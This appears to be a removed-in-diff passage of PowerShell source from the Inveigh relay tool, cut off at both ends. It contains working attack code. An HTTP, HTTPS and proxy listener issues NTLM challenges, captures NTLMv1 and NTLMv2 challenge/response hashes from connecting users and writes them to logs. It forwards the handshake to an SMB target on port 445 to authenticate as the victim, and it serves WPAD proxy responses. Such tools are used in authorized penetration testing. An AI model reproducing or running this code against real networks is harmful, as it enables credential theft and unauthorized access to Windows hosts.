- }
-
- try
- {
- $HTTP_listener.Start()
- }
- catch
- {
- $inveigh.console_queue.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener")
- $HTTP_running = $false
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Error starting $HTTP_type listener")
- }
-
- }
-
- :HTTP_listener_loop while($inveigh.relay_running -and $HTTP_running)
- {
- $TCP_request = ""
- $TCP_request_bytes = New-Object System.Byte[] 4096
- $HTTP_send = $true
- $HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("text/html")
- $HTTP_header_cache_control = ""
- $HTTP_header_authenticate = ""
- $HTTP_header_authenticate_data = ""
- $HTTP_message = ""
- $HTTP_header_authorization = ""
- $HTTP_header_host = ""
- $HTTP_header_user_agent = ""
- $HTTP_request_raw_URL = ""
- $NTLM = "NTLM"
-
- while(!$HTTP_listener.Pending() -and !$HTTP_client.Connected)
- {
- Start-Sleep -m 10
-
- if(!$inveigh.relay_running)
- {
- break HTTP_listener_loop
- }
-
- }
-
- if($relay_step -gt 0)
- {
- $relay_reset++
-
- if($relay_reset -gt 2)
- {
- $inveigh.console_queue.Add("SMB relay attack resetting")
- $SMB_relay_socket.Close()
- $relay_step = 0
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay attack resetting")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay attack resetting")
- }
-
- }
-
- }
- else
- {
- $relay_reset = 0
- }
-
- if($HTTPS_listener)
- {
-
- if(!$HTTP_client.Connected -or $HTTP_client_close -and $inveigh.relay_running)
- {
- $HTTP_client = $HTTP_listener.AcceptTcpClient()
- $HTTP_clear_stream = $HTTP_client.GetStream()
- $HTTP_stream = New-Object System.Net.Security.SslStream($HTTP_clear_stream,$false)
- $SSL_cert = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Subject -match $inveigh.certificate_CN})
- $HTTP_stream.AuthenticateAsServer($SSL_cert,$false,[System.Security.Authentication.SslProtocols]::Default,$false)
- }
-
- [byte[]]$SSL_request_bytes = $null
-
- do
- {
- $HTTP_request_byte_count = $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length)
- $SSL_request_bytes += $TCP_request_bytes[0..($HTTP_request_byte_count - 1)]
- } while ($HTTP_clear_stream.DataAvailable)
-
- $TCP_request = [System.BitConverter]::ToString($SSL_request_bytes)
- }
- else
- {
-
- if(!$HTTP_client.Connected -or $HTTP_client_close -and $inveigh.relay_running)
- {
- $HTTP_client = $HTTP_listener.AcceptTcpClient()
- $HTTP_stream = $HTTP_client.GetStream()
- }
-
- if($HTTP_stream.DataAvailable)
- {
- $HTTP_data_available = $true
- }
- else
- {
- $HTTP_data_available = $false
- }
-
- while($HTTP_stream.DataAvailable)
- {
- $HTTP_stream.Read($TCP_request_bytes,0,$TCP_request_bytes.Length)
- }
-
- $TCP_request = [System.BitConverter]::ToString($TCP_request_bytes)
- }
-
- if($TCP_request -like "47-45-54-20*" -or $TCP_request -like "48-45-41-44-20*" -or $TCP_request -like "4f-50-54-49-4f-4e-53-20*" -or $TCP_request -like "43-4f-4e-4e-45-43-54*")
- {
- $HTTP_raw_URL = $TCP_request.Substring($TCP_request.IndexOf("-20-") + 4,$TCP_request.Substring($TCP_request.IndexOf("-20-") + 1).IndexOf("-20-") - 3)
- $HTTP_raw_URL = $HTTP_raw_URL.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $HTTP_request_raw_URL = New-Object System.String ($HTTP_raw_URL,0,$HTTP_raw_URL.Length)
- $HTTP_source_IP = $HTTP_client.Client.RemoteEndpoint.Address.IPAddressToString
-
- if($TCP_request -like "*-48-6F-73-74-3A-20-*")
- {
- $HTTP_header_host_extract = $TCP_request.Substring($TCP_request.IndexOf("-48-6F-73-74-3A-20-") + 19)
- $HTTP_header_host_extract = $HTTP_header_host_extract.Substring(0,$HTTP_header_host_extract.IndexOf("-0D-0A-"))
- $HTTP_header_host_extract = $HTTP_header_host_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $HTTP_header_host = New-Object System.String ($HTTP_header_host_extract,0,$HTTP_header_host_extract.Length)
- }
-
- if($TCP_request -like "*-55-73-65-72-2D-41-67-65-6E-74-3A-20-*")
- {
- $HTTP_header_user_agent_extract = $TCP_request.Substring($TCP_request.IndexOf("-55-73-65-72-2D-41-67-65-6E-74-3A-20-") + 37)
- $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Substring(0,$HTTP_header_user_agent_extract.IndexOf("-0D-0A-"))
- $HTTP_header_user_agent_extract = $HTTP_header_user_agent_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $HTTP_header_user_agent = New-Object System.String ($HTTP_header_user_agent_extract,0,$HTTP_header_user_agent_extract.Length)
- }
-
- if($HTTP_request_raw_URL_old -ne $HTTP_request_raw_URL -or $HTTP_client_handle_old -ne $HTTP_client.Client.Handle)
- {
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent received from $HTTP_source_IP`:`n$HTTP_header_user_agent")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type request for $HTTP_request_raw_URL received from $HTTP_source_IP")
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type host header $HTTP_header_host received from $HTTP_source_IP")
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type user agent $HTTP_header_user_agent received from $HTTP_source_IP")
- }
-
- if($Proxy -eq 'Y' -and $ProxyIgnore.Count -gt 0 -and ($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_}))
- {
- $inveigh.console_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type ignoring wpad.dat request due to user agent from $HTTP_source_IP")
- }
-
- }
-
- }
-
- if($TCP_request -like "*-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-*")
- {
- $HTTP_header_authorization_extract = $TCP_request.Substring($TCP_request.IndexOf("-41-75-74-68-6F-72-69-7A-61-74-69-6F-6E-3A-20-") + 46)
- $HTTP_header_authorization_extract = $HTTP_header_authorization_extract.Substring(0,$HTTP_header_authorization_extract.IndexOf("-0D-0A-"))
- $HTTP_header_authorization_extract = $HTTP_header_authorization_extract.Split("-") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
- $HTTP_header_authorization = New-Object System.String ($HTTP_header_authorization_extract,0,$HTTP_header_authorization_extract.Length)
- }
-
- if(($HTTP_request_raw_URL -notmatch '/wpad.dat' -and $HTTPAuth -eq 'Anonymous') -or ($HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -eq 'Anonymous') -or (
- $HTTP_request_raw_URL -match '/wpad.dat' -and $WPADAuth -like 'NTLM*' -and $WPADAuthIgnore.Count -gt 0 -and ($WPADAuthIgnore | Where-Object {$HTTP_header_user_agent -match $_})))
- {
- $HTTP_response_status_code = 0x32,0x30,0x30
- $HTTP_response_phrase = 0x4f,0x4b
- $HTTP_client_close = $true
- }
- else
- {
-
- if($proxy_listener)
- {
- $HTTP_response_status_code = 0x34,0x30,0x37
- $HTTP_header_authenticate = 0x50,0x72,0x6f,0x78,0x79,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20
- }
- else
- {
- $HTTP_response_status_code = 0x34,0x30,0x31
- $HTTP_header_authenticate = 0x57,0x57,0x57,0x2d,0x41,0x75,0x74,0x68,0x65,0x6e,0x74,0x69,0x63,0x61,0x74,0x65,0x3a,0x20
-
- if($HTTP_request_raw_URL -match '/wpad.dat')
- {
- $HTTP_reset_delay = $true
- $HTTP_reset_delay_timeout = New-TimeSpan -Seconds $HTTPResetDelayTimeout
- $HTTP_reset_delay_stopwatch = [System.Diagnostics.Stopwatch]::StartNew()
- }
-
- }
-
- $HTTP_response_phrase = 0x55,0x6e,0x61,0x75,0x74,0x68,0x6f,0x72,0x69,0x7a,0x65,0x64
- $HTTP_client_close = $false
- }
-
- if($HTTP_header_authorization.StartsWith('NTLM '))
- {
- $HTTP_header_authorization = $HTTP_header_authorization -replace 'NTLM ',''
- [Byte[]]$HTTP_request_bytes = [System.Convert]::FromBase64String($HTTP_header_authorization)
-
- if([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '01-00-00-00')
- {
-
- if($inveigh.SMB_relay -and $HTTP_source_IP -ne $Target -and $relay_step -eq 0)
- {
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay triggered by $HTTP_source_IP")
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Grabbing challenge for relay from " + $Target)
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type to SMB relay triggered by $HTTP_source_IP")
- $inveigh.log.Add("$(Get-Date -format 's') - Grabbing challenge for relay from " + $Target)
- }
-
- $inveigh.console_queue.Add("$HTTP_type to SMB relay triggered by $HTTP_source_IP at $(Get-Date -format 's')")
- $inveigh.console_queue.Add("Grabbing challenge for relay from $Target")
- $SMB_relay_socket = New-Object System.Net.Sockets.TCPClient
- $SMB_relay_socket.Client.ReceiveTimeout = 60000
- $SMB_relay_socket.Connect($Target,"445")
- $HTTP_client_close = $false
- $relay_step = 1
-
- if(!$SMB_relay_socket.connected)
- {
- $inveigh.console_queue.Add("SMB relay target is not responding")
- $relay_step = 0
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SMB relay target is not responding")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - SMB relay target is not responding")
- }
-
- }
-
- if($relay_step -eq 1)
- {
- $SMB_relay_bytes = SMBRelayChallenge $SMB_relay_socket $HTTP_request_bytes $SMB_version
-
- if($SMB_relay_bytes.Length -le 3)
- {
- $relay_step = 0
- $NTLM = NTLMChallengeBase64 $Challenge $HTTP_source_IP $HTTP_client.Client.RemoteEndpoint.Port
- }
-
- }
-
- if($relay_step -eq 1)
- {
- $SMB_user_ID = $SMB_relay_bytes[34..33]
- $SMB_relay_NTLMSSP = [System.BitConverter]::ToString($SMB_relay_bytes)
- $SMB_relay_NTLMSSP = $SMB_relay_NTLMSSP -replace "-",""
- $SMB_relay_NTLMSSP_index = $SMB_relay_NTLMSSP.IndexOf("4E544C4D53535000")
- $SMB_relay_NTLMSSP_bytes_index = $SMB_relay_NTLMSSP_index / 2
- $SMB_domain_length = DataLength2 ($SMB_relay_NTLMSSP_bytes_index + 12) $SMB_relay_bytes
- $SMB_domain_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 12)..($SMB_relay_NTLMSSP_bytes_index + 19)]
- $SMB_target_length = DataLength2 ($SMB_relay_NTLMSSP_bytes_index + 40) $SMB_relay_bytes
- $SMB_target_length_offset_bytes = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 40)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length)]
- $SMB_relay_target_flag = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 22)]
- $SMB_relay_NTLM_challenge = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 24)..($SMB_relay_NTLMSSP_bytes_index + 31)]
- $SMB_relay_target_details = $SMB_relay_bytes[($SMB_relay_NTLMSSP_bytes_index + 56 + $SMB_domain_length)..($SMB_relay_NTLMSSP_bytes_index + 55 + $SMB_domain_length + $SMB_target_length)]
- $SMB_session_ID = $SMB_relay_bytes[44..51]
-
- if([System.BitConverter]::ToString($SMB_relay_bytes[4..7]) -eq 'ff-53-4d-42')
- {
- $SMB_version -eq 'SMB1'
- }
-
- $HTTP_NTLM_bytes = 0x4e,0x54,0x4c,0x4d,0x53,0x53,0x50,0x00,0x02,0x00,0x00,0x00 +
- $SMB_domain_length_offset_bytes +
- 0x05,0x82 +
- $SMB_relay_target_flag +
- 0xa2 +
- $SMB_relay_NTLM_challenge +
- 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00 +
- $SMB_target_length_offset_bytes +
- $SMB_relay_target_details
-
- $NTLM_challenge_base64 = [System.Convert]::ToBase64String($HTTP_NTLM_bytes)
- $NTLM = 'NTLM ' + $NTLM_challenge_base64
- $NTLM_challenge = SMBNTLMChallenge $SMB_relay_bytes
- $inveigh.HTTP_challenge_queue.Add($HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + ',' + $NTLM_challenge)
- $inveigh.console_queue.Add("Received challenge $NTLM_challenge for relay from $Target")
- $inveigh.console_queue.Add("Providing challenge $NTLM_challenge for relay to $HTTP_source_IP")
- $relay_step = 2
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Received challenge $NTLM_challenge for relay from $Target")
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Providing challenge $NTLM_challenge for relay to $HTTP_source_IP")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Received challenge $NTLM_challenge for relay from $Target")
- $inveigh.log.Add("$(Get-Date -format 's') - Providing challenge $NTLM_challenge for relay to $HTTP_source_IP")
- }
-
- }
- else
- {
- $NTLM = NTLMChallengeBase64 $Challenge $HTTP_source_IP $HTTP_client.Client.RemoteEndpoint.Port
- }
-
- }
- else
- {
- $NTLM = NTLMChallengeBase64 $Challenge $HTTP_source_IP $HTTP_client.Client.RemoteEndpoint.Port
- }
-
- }
- elseif([System.BitConverter]::ToString($HTTP_request_bytes[8..11]) -eq '03-00-00-00')
- {
- $HTTP_NTLM_length = DataLength2 20 $HTTP_request_bytes
- $HTTP_NTLM_offset = DataLength4 24 $HTTP_request_bytes
- $HTTP_NTLM_domain_length = DataLength2 28 $HTTP_request_bytes
- $HTTP_NTLM_domain_offset = DataLength4 32 $HTTP_request_bytes
- [String]$NTLM_challenge = $inveigh.HTTP_challenge_queue -like $HTTP_source_IP + $HTTP_client.Client.RemoteEndpoint.Port + '*'
- $inveigh.HTTP_challenge_queue.Remove($NTLM_challenge)
- $NTLM_challenge = $NTLM_challenge.Substring(($NTLM_challenge.IndexOf(",")) + 1)
-
- if($HTTP_NTLM_domain_length -eq 0)
- {
- $HTTP_NTLM_domain_string = ''
- }
- else
- {
- $HTTP_NTLM_domain_string = DataToString $HTTP_NTLM_domain_offset $HTTP_NTLM_domain_length $HTTP_request_bytes
- }
-
- $HTTP_NTLM_user_length = DataLength2 36 $HTTP_request_bytes
- $HTTP_NTLM_user_offset = DataLength4 40 $HTTP_request_bytes
-
- if($HTTP_NTLM_user_length -gt 0)
- {
- $HTTP_NTLM_user_string = DataToString $HTTP_NTLM_user_offset $HTTP_NTLM_user_length $HTTP_request_bytes
- }
- else
- {
- $HTTP_NTLM_user_string = ""
- }
-
- $HTTP_NTLM_host_length = DataLength2 44 $HTTP_request_bytes
- $HTTP_NTLM_host_offset = DataLength4 48 $HTTP_request_bytes
- $HTTP_NTLM_host_string = DataToString $HTTP_NTLM_host_offset $HTTP_NTLM_host_length $HTTP_request_bytes
-
- if($HTTP_NTLM_length -eq 24) # NTLMv1
- {
- $NTLM_type = "NTLMv1"
- $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[($HTTP_NTLM_offset - 24)..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-",""
- $NTLM_response = $NTLM_response.Insert(48,':')
- $HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_response + ":" + $NTLM_challenge
-
- if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
- {
- $inveigh.NTLMv1_list.Add($HTTP_NTLM_hash)
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_type $NTLM_type challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_type $NTLM_type challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)")
- }
-
- if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
- {
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash")
- }
- else
- {
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type $NTLM_type challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
- }
-
- if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
- {
- $inveigh.NTLMv1_file_queue.Add($HTTP_NTLM_hash)
- $inveigh.console_queue.Add("$HTTP_type $NTLM_type challenge/response written to " + $inveigh.NTLMv1_out_file)
- }
-
- if($inveigh.NTLMv1_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
- {
- $inveigh.NTLMv1_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
- }
-
- }
-
- }
- else # NTLMv2
- {
- $NTLM_type = "NTLMv2"
- $NTLM_response = [System.BitConverter]::ToString($HTTP_request_bytes[$HTTP_NTLM_offset..($HTTP_NTLM_offset + $HTTP_NTLM_length)]) -replace "-",""
- $NTLM_response = $NTLM_response.Insert(32,':')
- $HTTP_NTLM_hash = $HTTP_NTLM_user_string + "::" + $HTTP_NTLM_domain_string + ":" + $NTLM_challenge + ":" + $NTLM_response
-
- if($NTLM_challenge -and $NTLM_response -and ($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$'))))
- {
- $inveigh.NTLMv2_list.Add($HTTP_NTLM_hash)
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string captured from $HTTP_source_IP($HTTP_NTLM_host_string)")
- }
-
- if(!$inveigh.console_unique -or ($inveigh.console_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string"))
- {
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_hash")
- }
- else
- {
- $inveigh.console_queue.Add($(Get-Date -format 's') + " - $HTTP_type NTLMv2 challenge/response captured from $HTTP_source_IP ($HTTP_NTLM_host_string):`n$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string - not unique")
- }
-
- if($inveigh.file_output -and (!$inveigh.file_unique -or ($inveigh.file_unique -and $inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")))
- {
- $inveigh.NTLMv2_file_queue.Add($HTTP_NTLM_hash)
- $inveigh.console_queue.Add("$HTTP_type NTLMv2 challenge/response written to " + $inveigh.NTLMv2_out_file)
- }
-
- if($inveigh.NTLMv2_username_list -notcontains "$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
- {
- $inveigh.NTLMv2_username_list.Add("$HTTP_source_IP $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
- }
-
- }
-
- }
-
- $HTTP_response_status_code = 0x32,0x30,0x30
- $HTTP_response_phrase = 0x4f,0x4b
- $HTTP_client_close = $true
- $NTLM_challenge = ""
-
- if($inveigh.SMB_relay -and $relay_step -eq 2)
- {
-
- if(!$Usernames -or $Usernames -contains $HTTP_NTLM_user_string -or $Usernames -contains "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string")
- {
-
- if($inveigh.machine_accounts -or (!$inveigh.machine_accounts -and -not $HTTP_NTLM_user_string.EndsWith('$')))
- {
-
- if($inveigh.SMBRelay_failed_list -notcontains "$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string $Target")
- {
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $Target")
- }
-
- $inveigh.console_queue.Add("Sending $NTLM_type response for $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string for relay to $Target")
- SMBRelayResponse $SMB_relay_socket $HTTP_request_bytes $SMB_version $SMB_user_ID $SMB_session_ID
- $relay_step = 0
-
- }
- else
- {
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $Target")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $Target")
- }
-
- $inveigh.console_queue.Add("Aborting SMB relay since $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string has already been tried on $Target")
- $SMB_relay_socket.Close()
- $relay_step = 0
- }
-
- }
- else
- {
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_user_string appears to be a machine account")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - Aborting relay since $HTTP_NTLM_user_string appears to be a machine account")
- }
-
- $inveigh.console_queue.Add("Aborting SMB relay since $HTTP_NTLM_user_string appears to be a machine account")
- $SMB_relay_socket.Close()
- $relay_step = 0
- }
-
- }
- else
- {
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string not on relay username list")
- }
-
- if($inveigh.log_output)
- {
- $inveigh.log.Add("$(Get-Date -format 's') - $HTTP_NTLM_domain_string\$HTTP_NTLM_user_string not on relay username list")
- }
-
- $inveigh.console_queue.Add("$HTTP_NTLM_domain_string\$HTTP_NTLM_user_string not on SMB relay username list")
- $SMB_relay_socket.Close()
- $relay_step = 0
- }
-
- }
-
- if($proxy_listener)
- {
- $HTTP_send = $false
- }
-
- }
- else
- {
- $HTTP_client_close = $false
- }
-
- }
-
- if(!$proxy_listener -and $WPADResponse -and $HTTP_request_raw_URL -match '/wpad.dat' -and (!$ProxyIgnore -or !($ProxyIgnore | Where-Object {$HTTP_header_user_agent -match $_})))
- {
- $HTTP_message = $WPADResponse
- $HTTP_header_content_type = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x54,0x79,0x70,0x65,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes("application/x-ns-proxy-autoconfig")
- }
-
- $HTTP_timestamp = Get-Date -format r
- $HTTP_timestamp = [System.Text.Encoding]::UTF8.GetBytes($HTTP_timestamp)
- $HTTP_header_content_length = 0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20 + [System.Text.Encoding]::UTF8.GetBytes($HTTP_message.Length)
- $HTTP_message_bytes = [System.Text.Encoding]::UTF8.GetBytes($HTTP_message)
-
- if($HTTP_request_raw_URL -notmatch '/wpad.dat' -or ($WPADAuth -like 'NTLM*' -and $HTTP_request_raw_URL -match '/wpad.dat') -and !$HTTP_client_close)
- {
- $HTTP_header_authenticate_data = [System.Text.Encoding]::UTF8.GetBytes($NTLM)
- }
-
- $packet_HTTPResponse = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_HTTPResponse.Add("HTTPResponse_RequestVersion",[Byte[]](0x48,0x54,0x54,0x50,0x2f,0x31,0x2e,0x31,0x20))
- $packet_HTTPResponse.Add("HTTPResponse_StatusCode",$HTTP_response_status_code + [Byte[]](0x20))
- $packet_HTTPResponse.Add("HTTPResponse_ResponsePhrase",$HTTP_response_phrase + [Byte[]](0x0d,0x0a))
- $packet_HTTPResponse.Add("HTTPResponse_Server",[Byte[]](0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,0x0a))
- $packet_HTTPResponse.Add("HTTPResponse_TimeStamp",[Byte[]](0x44,0x61,0x74,0x65,0x3a,0x20) + $HTTP_timestamp + [Byte[]](0x0d,0x0a))
- $packet_HTTPResponse.Add("HTTPResponse_ContentLength",$HTTP_header_content_length + [Byte[]](0x0d,0x0a))
-
- if($HTTP_header_authenticate -and $HTTP_header_authenticate_data)
- {
- $packet_HTTPResponse.Add("HTTPResponse_AuthenticateHeader",$HTTP_header_authenticate + $HTTP_header_authenticate_data + [Byte[]](0x0d,0x0a))
- }
-
- if($HTTP_header_content_type)
- {
- $packet_HTTPResponse.Add("HTTPResponse_ContentType",$HTTP_header_content_type + [Byte[]](0x0d,0x0a))
- }
-
- if($HTTP_header_cache_control)
- {
- $packet_HTTPResponse.Add("HTTPResponse_CacheControl",$HTTP_header_cache_control + [Byte[]](0x0d,0x0a))
- }
-
- if($HTTP_send)
- {
- $packet_HTTPResponse.Add("HTTPResponse_Message",[Byte[]](0x0d,0x0a) + $HTTP_message_bytes)
- $HTTP_response = ConvertFrom-PacketOrderedDictionary $packet_HTTPResponse
- $HTTP_stream.Write($HTTP_response,0,$HTTP_response.Length)
- $HTTP_stream.Flush()
- }
-
- Start-Sleep -m 10
- $HTTP_request_raw_URL_old = $HTTP_request_raw_URL
- $HTTP_client_handle_old = $HTTP_client.Client.Handle
-
- if($HTTP_client_close)
- {
-
- if($proxy_listener)
- {
- $HTTP_client.Client.Close()
- }
- else
- {
- $HTTP_client.Close()
- }
-
- }
-
- }
- else
- {
-
- if($HTTP_data_available -or !$HTTP_reset_delay -or $HTTP_reset_delay_stopwatch.Elapsed -ge $HTTP_reset_delay_timeout)
- {
- $HTTP_client.Close()
- $HTTP_client_close = $true
- $HTTP_reset_delay = $false
- }
- else
- {
- Start-Sleep -m 100
- }
-
- }
-
- }
-
- $HTTP_client.Close()
- start-sleep -s 1
- $HTTP_listener.Server.blocking = $false
- Start-Sleep -s 1
- $HTTP_listener.Server.Close()
- Start-Sleep -s 1
- $HTTP_listener.Stop()
-}
-
-# Control Relay Loop ScriptBlock
-$control_relay_scriptblock =
-{
- param ($ConsoleQueueLimit,$RelayAutoExit,$RunTime)
-
- function StopInveigh
- {
- param ([String]$exit_message)
-
- if($inveigh.HTTPS -and !$inveigh.HTTPS_existing_certificate -or ($inveigh.HTTPS_existing_certificate -and $inveigh.HTTPS_force_certificate_delete))
- {
-
- try
- {
- $certificate_store = New-Object System.Security.Cryptography.X509Certificates.X509Store("My","LocalMachine")
- $certificate_store.Open('ReadWrite')
- $certificates = (Get-ChildItem Cert:\LocalMachine\My | Where-Object {$_.Issuer -Like "CN=" + $inveigh.certificate_issuer})
-
- ForEach($certificate in $certificates)
- {
- $certificate_store.Remove($certificate)
- }
-
- $certificate_store.Close()
- }
- catch
- {
- $inveigh.console_queue.Add("SSL Certificate Deletion Error - Remove Manually")
-
- if($inveigh.file_output)
- {
- $inveigh.log_file_queue.Add("$(Get-Date -format 's') - SSL Certificate Deletion Error - Remove Manually")
- }
-
- if($inveigh.log_output)
- {
